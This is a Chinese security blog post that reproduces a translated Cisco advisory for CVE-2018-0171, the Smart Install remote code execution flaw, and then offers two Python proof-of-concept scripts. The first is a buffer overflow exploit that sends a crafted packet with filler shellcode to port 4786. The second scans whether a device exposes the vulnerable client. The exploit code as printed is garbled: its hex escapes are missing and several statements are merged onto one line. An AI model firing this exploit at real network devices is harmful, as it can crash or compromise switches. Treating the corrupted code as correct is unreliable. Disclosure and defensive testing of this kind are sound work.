微慑信息网
        找回密码

[CVE-2018-0171]Cisco IOS/IOS XE软件智能安装远程执行代码漏洞[POC]

2018-04-07 分类:Hardware / OS / 业界快讯 / 漏洞收集 作者:微慑管理员 评论(1)
cisco-sa-20180328-smi2
CVE-2018-0171
附POC
概要

  • Cisco IOS软件和Cisco IOS XE软件的智能安装功能中的漏洞可能允许未经身份验证的远程攻击者触发重新加载受影响的设备,从而导致拒绝服务(DoS)条件或执行任意代码受影响设备。

    该漏洞是由于数据包数据验证不正确所致。攻击者可以通过向TCP端口4786上的受影响设备发送精心设计的智能安装消息来利用此漏洞。成功的漏洞利用可能会导致攻击者在受影响的设备上导致缓冲区溢出,这可能会产生以下影响:

    • 触发设备的重新加载
    • 允许攻击者在设备上执行任意代码
    • 在受影响的设备上引发无限循环,触发看门狗崩溃

    思科发布了解决此漏洞的软件更新。没有解决此漏洞的解决方法。

    此通报可通过以下链接获得:https
    //tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2

    此通报是2018年3月28日发布的Cisco IOS和IOS XE软件安全咨询捆绑出版物的一部分,该出版物包含20个用于描述22个漏洞的思科安全通报。有关这些建议和链接的完整列表,请参阅思科事件响应:2018年3月半年一次的Cisco IOS和IOS XE软件安全建议捆绑出版物

受影响的产品

  • 易受攻击的产品

    此漏洞会影响运行Cisco IOS或IOS XE软件的易受攻击版本的思科设备,并启用智能安装客户端功能。

    只有智能安装客户端交换机受此通报中描述的漏洞的影响。配置为智能安装导向器的Cisco设备不受此漏洞的影响。

    有关哪些Cisco IOS和IOS XE软件版本易受攻击的信息,请参阅此通报的“ 固定软件”部分。

    有关具体发布的注意事项

    智能安装客户端功能默认情况下在Cisco IOS交换机上的软件版本上启用,这些软件版本尚未更新为解决Cisco Bug ID CSCvd36820的问题

    运行早于Cisco IOS软件版本12.2(52)SE的版本的交换机不能运行智能安装,但如果它们支持归档下载sw特权EXEC命令,它们可以是智能安装客户端。

    确定是否启用智能安装客户端功能

    要确定设备是否配置了Smart Install客户端功能,请在Smart Install客户端上使用show vstack configprivileged EXEC命令。来自show vstack config命令的Role:ClientOper Mode:EnabledRole:Client(已启用SmartInstall)输出确认设备上已启用该功能。

    以下示例显示配置为智能安装客户端的Cisco Catalyst交换机上show vstack config命令的输出:

    switch1# show vstack config
 Role: Client (SmartInstall enabled)
 .
 .
 .

switch2# show vstack config
 Capability: Client
 Oper Mode: Enabled
 Role: Client
 .
 .
 .

    确定Cisco IOS软件版本

    要确定设备上运行的是哪个Cisco IOS软件版本,管理员可以登录设备,在CLI中使用show version命令,然后参考出现的系统标题。如果设备运行Cisco IOS软件,系统横幅将显示类似于Cisco Internetwork操作系统软件Cisco IOS软件的文本。该横幅还在括号中显示安装的映像名称,随后显示Cisco IOS软件版本号和发行版名称。某些思科设备不支持show version命令或可能提供不同的输出。

    以下示例显示了运行Cisco IOS软件版本15.5(2)T1并且安装映像名称为C2951-UNIVERSALK9-M的设备的命令输出:

    Router> show version

Cisco IOS Software, C2951 Software (C2951-UNIVERSALK9-M), Version 15.5(2)T1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Mon 22-Jun-15 09:32 by prod_rel_team
.

    有关Cisco IOS软件版本的命名和编号约定的信息,请参阅Cisco IOS和NX-OS软件参考指南

    确定Cisco IOS XE软件版本

    要确定设备上运行的是哪个Cisco IOS XE软件版本,管理员可以登录设备,在CLI中使用show version命令,然后参考出现的系统标题。如果设备运行Cisco IOS XE软件,系统横幅将显示Cisco IOS软件Cisco IOS XE软件或类似文本。

    以下示例显示了运行Cisco IOS XE软件版本16.2.1的设备的命令输出,并且已安装映像名称为CAT3K_CAA-UNIVERSALK9-M

    ios-xe-device# show version

Cisco IOS Software, Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version Denali 16.2.1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Sun 27-Mar-16 21:47 by mcpre
.
.
.

    有关Cisco IOS XE软件版本的命名和编号约定的信息,请参阅“ Cisco IOS和NX-OS软件参考指南”

    确认产品不易受损

    目前还没有其他思科产品受此漏洞影响。

    思科已确认此漏洞不影响Cisco IOS XR软件或Cisco NX-OS软件。

细节

  • 思科智能安装是一种“即插即用”配置和图像管理功能,可为新(典型接入层)交换机提供零接触部署。该功能允许客户将思科交换机运送到任何位置,将其安装到网络中,然后启动,无需其他配置要求。智能安装功能不包含按设计进行的身份验证。

    智能安装网络包含恰好一个智能安装控制器交换机或路由器(也称为集成分支控制器(IBD))和一个或多个智能安装客户端交换机(也称为集成分支客户端(IBC))。客户端交换机不需要直接连接到导演; 客户端交换机可以高达7跳。

    导演为客户端交换机的图像和配置提供单一管理点。当客户端交换机首次安装在网络中时,Director会自动检测到新交换机,并识别出正确的Cisco IOS软件映像和用于下载的配置文件。导演还可以为客户端分配IP地址和主机名。

解决方法

  • 对于需要使用思科智能安装的客户,没有解决此漏洞的解决方法。对于不需要思科智能安装的客户,可以使用no vstack命令禁用该功能  。在与Cisco Bug ID CSCvd36820相关联的软件版本中,思科智能安装将在不使用时自动禁用。

    鼓励管理员参考思科智能安装协议误用智能安装配置指南中的信息安全建议。

固定软件

  • 思科已发布免费软件更新来解决此通报中描述的漏洞。客户只能安装并期望获得对购买许可证的软件版本和功能集的支持。通过安装,下载,访问或以其他方式使用此类软件升级,客户同意遵守思科软件许可证的条款:https :
    //www.cisco.com/c/en/us/products/end-user-license- agreement.html

    此外,客户只能下载拥有有效许可证的软件,并直接从思科采购,或通过思科授权经销商或合作伙伴购买。在大多数情况下,这将是以前购买的软件的维护升级。免费的安全软件更新不会让客户获得新的软件许可证,附加的软件功能集或主要的版本升级。

    在考虑软件升级时,建议客户定期查阅思科产品的建议(可从思科安全咨询和警报页面获取),以确定暴露和完整的升级解决方案。

    在所有情况下,客户应确保要升级的设备包含足够的内存,并确认当前的硬件和软件配置将继续得到新版本的支持。如果信息不清楚,建议客户联系思科技术支持中心(TAC)或其合同维护提供商。

    没有服务合同的客户

    从思科直接购买但未持有思科服务合同的客户以及通过第三方供应商购买但通过其销售点获得固定软件不成功的客户应通过联系思科TAC获得升级:
    https:// www .cisco.com / C / EN / US /支持/网络/ TSD-思科全球-contacts.html

    客户应提供产品序列号,并准备提供此通报的URL作为免费升级权利的证据。

    Cisco IOS和IOS XE软件

    为了帮助客户确定他们在Cisco IOS和IOS XE软件中的漏洞风险,思科提供了一个工具 – Cisco IOS软件检查器,用于识别影响特定软件版本的任何思科安全通报,以及修复每个版本中描述的漏洞的最早版本咨询(“First Fixed”)。如果适用,该工具还会返回修复所有已确定的公告中所述的所有漏洞的最早版本(“组合第一次修复”)。

    客户可以使用此工具执行以下任务:

    • 通过从下拉列表中选择一个或多个版本或从本地系统上传文件以便解析工具来启动搜索
    • 输入要解析的工具的show version命令的输出
    • 创建一个自定义搜索,包括以前发布的所有思科安全建议,特定的咨询或最新捆绑出版物中的所有建议

    要确定版本是否受到任何已发布的思科安全建议的影响,请使用Cisco.com上的Cisco IOS软件检查器或输入Cisco IOS软件或Cisco IOS XE软件版本(例如15.1(4)M23.13.8S)在以下领域:

    有关Cisco IOS XE软件版本到Cisco IOS软件版本的映射,请参阅Cisco IOS XE 2版本说明Cisco IOS XE 3S版本说明Cisco IOS XE 3SG版本说明,具体取决于Cisco IOS XE软件版本。

开发和公告

  • 思科产品安全事件响应小组(PSIRT)不知道此通报中描述的任何公开声明或恶意使用此漏洞的情况。

资源

  • 思科要感谢来自Embedi的George Nosenko通过GeekPwn报告此漏洞。

网址
修订记录

拓展阅读(点评/知识):

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2

POC1:

url:https://github.com/hacking-anything/research

# smi_ibc_init_discovery_BoF.py

import socket 
import struct 
from optparse import OptionParser 

# Parse the target options 
parser = OptionParser() 
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1")  parser.add_option("-p", "--port", dest="port", 
type="int", help="Port of Client", default=4786)  (options, args) = parser.parse_args() 

def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'): 
    return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v 

def send_packet(sock, packet): 
    sock.send(packet)   

def receive(sock):  
    return sock.recv() 

if __name__ == "__main__": 

    print "[*] Connecting to Smart Install Client ", options.target, "port", options.port 

    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    con.connect((options.target, options.port)) 

    payload = 'BBBB' * 44  shellcode = 'D' * 2048 

    data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload 

    tlv_1 = craft_tlv(0x00000001, data)  tlv_2 = shellcode 

    hdr =  'x00x00x00x01'                                   # msg_from
    hdr += 'x00x00x00x01'                                   # version
    hdr += 'x00x00x00x07'                                   # msg_hdr_type
    hdr += struct.pack('>I', len(data))                         # data_length

    pkt = hdr + tlv_1 + tlv_2 

    print "[*] Send a malicious packet"  
    send_packet(con, pkt)

POC2:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Author: Michael Schueler <[email][email protected][/email]>
# Based on work by: Jaime Filson <[email][email protected][/email]>
# Date: 2017-03-17

import sys
import socket

halt = False

try:
    import argparse
except ImportError:
    print('Missing needed module: argparse')
    halt = True

if halt:
    sys.exit()


def setup():
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--ip', action='store', dest='ip', required=True, help='IP Address to check')
    parser.add_argument('-p', '--port', action='store', dest='port', type=int, default=4786, help='PORT to check')

    global args
    args = parser.parse_args()


def main():
    setup()

    CONN_TIMEOUT = 10

    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.settimeout(CONN_TIMEOUT)

    try:
        conn.connect((args.ip, args.port))
    except socket.gaierror:
        print('[ERROR] Could not resolve hostname. Exiting.')
        sys.exit()
    except socket.error:
        print('[ERROR] Could not connect to {0}:{1}'.format(args.ip, args.port))
        print('[INFO] Either Smart Install feature is Disabled, or Firewall is blocking port {0}'.format(args.port))
        print('[INFO] {0} is not affected'.format(args.ip))
        sys.exit()

    if conn:
        req = '0' * 7 + '1' + '0' * 7 + '1' + '0' * 7 + '4' + '0' * 7 + '8' + '0' * 7 + '1' + '0' * 8
        resp = '0' * 7 + '4' + '0' * 8 + '0' * 7 + '3' + '0' * 7 + '8' + '0' * 7 + '1' + '0' * 8

        print('[INFO] Sending TCP probe to {0}:{1}'.format(args.ip, args.port))

        conn.send(req.decode('hex'))

        while True:
            try:
                data = conn.recv(512)

                if (len(data) < 1):
                    print('[INFO] Smart Install Director feature active on {0}:{1}'.format(args.ip, args.port))
                    print('[INFO] {0} is not affected'.format(args.ip))
                    break
                elif (len(data) == 24):
                    if (data.encode('hex') == resp):
                        print('[INFO] Smart Install Client feature active on {0}:{1}'.format(args.ip, args.port))
                        print('[INFO] {0} is affected'.format(args.ip))
                        break
                    else:
                        print(
                        '[ERROR] Unexpected response received, Smart Install Client feature might be active on {0}:{1}'.format(
                            args.ip, args.port))
                        print('[INFO] Unclear whether {0} is affected or not'.format(args.ip))
                        break
                else:
                    print(
                    '[ERROR] Unexpected response received, Smart Install Client feature might be active on {0}:{1}'.format(
                        args.ip, args.port))
                    print('[INFO] Unclear whether {0} is affected or not'.format(args.ip))
                    break

            except socket.error:
                print('[ERROR] No response after {0} seconds (default connection timeout)'.format(CONN_TIMEOUT))
                print('[INFO] Unclear whether {0} is affected or not'.format(args.ip))
                break

            except KeyboardInterrupt:
                print('[ERROR] User ended script early with Control + C')
                break

        conn.close()


if __name__ == "__main__":
    main()

 

 

本文标题:[CVE-2018-0171]Cisco IOS/IOS XE软件智能安装远程执行代码漏洞[POC]
本文链接:
(转载请附上本文链接)		https://vulsee.com/archives/vulsee_2018/0407_6290.html
标签:
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » [CVE-2018-0171]Cisco IOS/IOS XE软件智能安装远程执行代码漏洞[POC]
分享到: 更多 (0)

相关推荐

评论 1

取消

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
  1. #0

    参考:https://embedi.com/blog/cisco-smart-install-remote-code-execution/

    微慑管理员5年前 (2018-04-10)回复

微慑信息网 专注工匠精神

访问我们联系我们